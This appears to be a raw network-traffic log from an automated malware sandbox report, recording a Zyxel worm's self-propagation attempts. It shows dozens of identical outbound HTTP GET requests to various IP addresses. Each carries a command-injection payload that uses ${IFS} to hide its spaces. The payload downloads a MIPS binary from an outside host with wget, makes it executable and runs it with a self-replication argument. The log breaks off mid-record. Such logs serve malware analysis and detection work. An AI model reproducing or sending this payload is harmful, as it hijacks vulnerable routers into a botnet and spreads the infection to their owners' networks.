                                          Jan 14, 2024 15:46:37.488774061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9556192.168.2.234417641.132.85.198443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.488801956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9557192.168.2.235442865.179.140.52443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.488866091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9558192.168.2.2348582130.236.72.240443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.488945007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9559192.168.2.235097423.21.6.37443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.488987923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9560192.168.2.2337234121.62.89.102443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.489041090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9561192.168.2.235551863.128.144.148443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.489090919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9562192.168.2.2360210131.191.9.61443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.489147902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9563192.168.2.235378087.142.177.162443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.489200115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9564192.168.2.23601169.221.71.39443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.489275932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9565192.168.2.2340900206.85.33.56443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.489332914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9566192.168.2.2349936223.166.56.98443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.489372015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9567192.168.2.235391637.207.41.35443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.489408016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9568192.168.2.2355420118.138.152.139443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.489476919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9569192.168.2.2339438140.7.188.84443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.489531994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9570192.168.2.235407035.98.116.44443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.489584923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9571192.168.2.2344180144.201.109.107443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.489645958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9572192.168.2.2336980171.127.80.185443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.489672899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9573192.168.2.2355084188.22.65.196443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.489727020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9574192.168.2.2357942188.201.243.99443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.489775896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9575192.168.2.2342124155.180.166.178443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.489814997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9576192.168.2.235024066.246.173.109443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.489870071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9577192.168.2.2358508138.97.124.7443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.489912033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9578192.168.2.2334146130.141.79.171443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.489972115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9579192.168.2.235830245.239.32.234443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.490000963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9580192.168.2.2340432136.251.60.11443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.490072966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9581192.168.2.2352288200.245.172.81443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.490127087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9582192.168.2.233885820.245.253.247443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.490185976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9583192.168.2.2352522167.94.19.214443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.490226030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9584192.168.2.23481105.188.96.153443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.490278959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9585192.168.2.233737898.98.149.144443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.490315914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9586192.168.2.2351070125.108.223.234443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.490353107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9587192.168.2.2358734135.99.104.154443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.490403891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9588192.168.2.234372499.42.29.150443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.490428925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9589192.168.2.2339694134.142.176.156443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.490504026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9590192.168.2.2359802144.243.124.160443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.490530014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9591192.168.2.2336040170.110.24.141443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.490560055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9592192.168.2.235802651.106.104.138443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.490582943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9593192.168.2.234527219.39.241.211443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.490631104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9594192.168.2.2344040190.81.129.213443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.490689039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9595192.168.2.235560823.221.17.236443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.490725994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9596192.168.2.2350996137.108.224.180443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.490776062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9597192.168.2.2340898190.147.121.35443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.490813017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9598192.168.2.233484812.244.55.212443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.490864992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9599192.168.2.2360202203.6.13.224443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.490932941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9600192.168.2.2333584177.47.76.107443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.490998983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9601192.168.2.2345024183.7.196.65443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.491034985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9602192.168.2.2340580106.233.117.53443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.491080046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9603192.168.2.2347800134.159.15.83443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.491107941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9604192.168.2.233578693.53.133.240443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.491142035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9605192.168.2.233388675.229.129.38443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.491204977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9606192.168.2.2345192114.126.153.17443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.491256952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9607192.168.2.2351726170.140.140.248443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.491276026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9608192.168.2.2356932139.55.177.175443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.491316080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9609192.168.2.235916693.115.108.150443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.491354942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9610192.168.2.234839265.210.65.36443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.491441965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9611192.168.2.235610287.132.38.202443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.491494894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9612192.168.2.235628635.154.101.183443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.491560936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9613192.168.2.234398017.129.117.11443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.491595030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9614192.168.2.235341895.252.191.233443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.491686106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9615192.168.2.2335612153.138.116.36443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.491729975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9616192.168.2.234470688.148.86.223443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.491756916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9617192.168.2.233507874.138.195.10443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.491810083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9618192.168.2.2346202143.197.51.125443
                                          TimestampBytes transferredDirectionData
